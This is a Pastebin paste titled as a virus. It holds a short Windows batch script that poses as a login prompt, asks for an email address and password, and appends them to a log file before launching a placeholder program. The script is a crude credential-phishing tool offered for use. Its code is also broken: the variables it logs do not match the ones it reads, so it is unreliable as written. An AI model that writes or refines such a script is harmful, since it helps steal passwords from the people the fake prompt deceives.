Advertisement
Guest User

Virus Try IT!!!!!!!!

a guest
Mar 21st, 2019
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. @echo off
  2. color a
  3. title Login
  4. cls
  5. echo Please Enter Your Email Address And Password
  6. echo.
  7. echo.
  8. cd “C:\Logs”
  9. set /p user=Username:
  10. set /p pass =Password:
  11. echo Username=”%cra003%” Password=”%cGdzm3kf%” >> Log.txt
  12. start >>Program Here<<
  13. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement